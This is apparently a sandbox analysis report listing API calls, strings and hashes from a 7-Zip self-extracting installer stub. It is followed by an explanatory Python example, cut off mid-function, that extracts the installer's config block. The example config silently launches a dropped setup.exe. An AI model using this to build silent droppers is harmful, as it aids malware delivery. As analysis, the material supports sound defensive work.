                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                    • String ID:
                                                                    • API String ID: 747815384-0
                                                                    • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                    • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                    • String ID:
                                                                    • API String ID: 801014965-0
                                                                    • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                    • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00407831
                                                                    • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                    • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                    • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                    • GetWindowDC.USER32(?), ref: 00407896
                                                                    • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                    • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                    • String ID:
                                                                    • API String ID: 2586545124-0
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                      • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                    • wsprintfA.USER32 ref: 00403C31
                                                                    • wsprintfA.USER32 ref: 00403C5E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$wsprintf
                                                                    • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 2704270482-695273242
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                    • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                    • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                    • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$Focus
                                                                    • String ID:
                                                                    • API String ID: 3946207451-0
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                    • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AddressLibraryLoadProc
                                                                    • String ID: hA$SetWindowTheme$uxtheme
                                                                    • API String ID: 324724604-1539679821
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                    • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                    • GetDC.USER32(00000000), ref: 004076E7
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                    • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                    • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2693764856-0
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 0040721C
                                                                    • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                    • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                    • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                    • SelectObject.GDI32(?,?), ref: 00407266
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                    • SelectObject.GDI32(?,?), ref: 004072A7
                                                                    • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                    • String ID:
                                                                    • API String ID: 2466489532-0
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                    • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                    • wsprintfW.USER32 ref: 0040821E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                    • String ID: %d%%
                                                                    • API String ID: 3753976982-1518462796
                                                                    APIs
                                                                    • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                    • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                    • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                    • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                    • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: DialogThreadTimer$KillResumeSuspend
                                                                    • String ID:
                                                                    • API String ID: 4151135813-0
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%M/$%%M\
                                                                    • API String ID: 613200358-4143866494
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%T/$%%T\
                                                                    • API String ID: 613200358-2679640699
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%S/$%%S\
                                                                    • API String ID: 613200358-358529586
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow
                                                                    • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                    • API String ID: 432778473-1797977924
                                                                    • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                    • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                    • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 4038993085-372238525
                                                                    • Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                    • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                    • Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                    • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: wsprintf$ExitProcesslstrcat
                                                                    • String ID: 0x%p
                                                                    • API String ID: 2530384128-1745605757
                                                                    • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                    • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407DB6
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                    • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                    • String ID: A
                                                                    • API String ID: 1557639607-3554254475
                                                                    • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                    • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                    • String ID: SetEnvironment
                                                                    • API String ID: 612612615-360490078
                                                                    • Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                    • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                    • Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                    • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
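The function at 00405543 above hands `;!@Install@!UTF-8!` and `;!@InstallEnd@!` to its string routines, and the function at 00402BA2 passes a `SetEnvironment` value through ExpandEnvironmentStringsW. Those two markers delimit the 7-Zip SFX installer configuration that a self-extracting stub carries between its own code and the appended 7z archive; the text between them (Title, RunProgram, SetEnvironment and so on) is what tells the stub which dropped file to launch and with which arguments, so it is the first thing to pull out of a sample like this one. The Python below is an added example written for this report, not code from the sample or from 7-Zip: it locates that block in raw bytes, parses the `Key="value"` entries (whitespace and `;` comments between entries, backslash escapes for n, t, backslash and double quote inside values; these are 7-Zip's text-config rules as I know them and should be treated as an assumption), then applies SetEnvironment directives in order and expands `%NAME%` references the way ExpandEnvironmentStringsW does (case-insensitive, unknown names left as written). The `%%T` (temp folder) and `%%S` placeholders, the sample blob and the folder paths are constructed for the example; where exactly the real stub substitutes them is not shown on this page.

```python
import re

# 7-Zip SFX installer stubs keep their script between these two markers,
# with the 7z archive appended after the end marker.
BEGIN_MARKER = b";!@Install@!UTF-8!"
END_MARKER = b";!@InstallEnd@!"

# Constructed stand-in for the tail of an SFX stub; not bytes from the analysed sample.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 12 + b"[stub code]\x00"
    + BEGIN_MARKER + b"\r\n"
    + b"; comment lines start with a semicolon\r\n"
    + b'Title="Driver Update"\r\n'
    + b'SetEnvironment="INSTDIR=%%S\\\\tools"\r\n'
    + b'RunProgram="%%T\\\\setup.exe /S /D=\\"%INSTDIR%\\""\r\n'
    + b'GUIMode="2"\r\n'
    + END_MARKER + b"\r\n"
    + b"7z\xbc\xaf\x27\x1c" + b"\x00" * 8
)

_KEY_RE = re.compile(r'([A-Za-z0-9_]+)\s*=\s*"')
_ENV_RE = re.compile(r"%([^%]+)%")
_ESCAPES = {"n": "\n", "t": "\t", "\\": "\\", '"': '"'}


def extract_config(blob: bytes) -> str:
    """Return the UTF-8 text between the install markers ('' if there is none).
    The markers sit in the stub's data, so search raw bytes rather than a PE parse."""
    start = blob.find(BEGIN_MARKER)
    if start < 0:
        return ""
    end = blob.find(END_MARKER, start)
    if end < 0:
        raise ValueError("install block has a begin marker but no end marker")
    return blob[start + len(BEGIN_MARKER):end].decode("utf-8", errors="replace")


def parse_config(text: str) -> list:
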